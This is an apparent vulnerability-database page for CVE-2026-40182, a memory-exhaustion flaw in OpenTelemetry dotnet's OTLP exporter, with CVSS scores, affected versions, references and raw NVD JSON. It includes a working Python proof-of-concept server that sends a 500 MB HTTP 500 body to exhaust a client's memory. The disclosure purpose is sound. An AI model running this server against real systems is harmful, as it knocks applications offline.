CVE-2026-40182

Description

OpenTelemetry dotnet is a dotnet telemetry framework. From 1.13.1 to before 1.15.2, When exporting telemetry to a back-end/collector over gRPC or HTTP using OpenTelemetry Protocol format (OTLP), if the request results in a unsuccessful request (i.e. HTTP 4xx or 5xx), the response is read into memory with no upper-bound on the number of bytes consumed. This could cause memory exhaustion in the consuming application if the configured back-end/collector endpoint is attacker-controlled (or a network attacker can MitM the connection) and an extremely large body is returned by the response. This vulnerability is fixed in 1.15.2.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:* - VULNERABLE

OpenTelemetry dotnet >= 1.13.1, < 1.15.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# This is a simulation of a malicious backend server that triggers the vulnerability.
# It listens for connections and returns an HTTP 500 response with a massive body.

import socket

def malicious_server():
    host = '0.0.0.0'
    port = 4317  # Default OTLP gRPC/HTTP port often used
    
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(1)
    print(f"Malicious server listening on {port}...")
    
    while True:
        client_socket, addr = server_socket.accept()
        print(f"Connection from {addr}")
        
        # Receive request (ignore content)
        client_socket.recv(4096)
        
        # Construct a large malicious payload (e.g., 500MB)
        # This simulates a response designed to exhaust memory
        large_payload = b"A" * (500 * 1024 * 1024) 
        
        # Send HTTP 500 Response headers
        response_headers = (
            "HTTP/1.1 500 Internal Server Error\r\n"
            "Content-Type: application/x-protobuf\r\n"
            f"Content-Length: {len(large_payload)}\r\n"
            "\r\n"
        )
        
        client_socket.sendall(response_headers.encode())
        print("Sending headers...")
        
        # Send the large body
        client_socket.sendall(large_payload)
        print("Sent large payload. Memory exhaustion likely triggered on client.")
        
        client_socket.close()

if __name__ == "__main__":
    malicious_server()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40182
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40182
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40182/
[4] VulDB https://vuldb.com/cve/CVE-2026-40182
[5] https://github.com/open-telemetry/opentelemetry-dotnet/pull/6564
[6] https://github.com/open-telemetry/opentelemetry-dotnet/pull/7017
[7] https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-q834-8qmm-v933
[8] https://github.com/open-telemetry/opentelemetry-proto/pull/781

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40182", "sourceIdentifier": "[email protected]", "published": "2026-04-23T18:16:28.130", "lastModified": "2026-04-29T13:52:26.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry dotnet is a dotnet telemetry framework. From 1.13.1 to before 1.15.2, When exporting telemetry to a back-end/collector over gRPC or HTTP using OpenTelemetry Protocol format (OTLP), if the request results in a unsuccessful request (i.e. HTTP 4xx or 5xx), the response is read into memory with no upper-bound on the number of bytes consumed. This could cause memory exhaustion in the consuming application if the configured back-end/collector endpoint is attacker-controlled (or a network attacker can MitM the connection) and an extremely large body is returned by the response. This vulnerability is fixed in 1.15.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:*", "versionStartIncluding": "1.13.1", "versionEndExcluding": "1.15.2", "matchCriteriaId": "5539A01E-6E54-4AE2-8D72-6E5C15C01C61"}]}]}], "references": [{"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/6564", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7017", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-q834-8qmm-v933", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/open-telemetry/opentelemetry-proto/pull/781", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}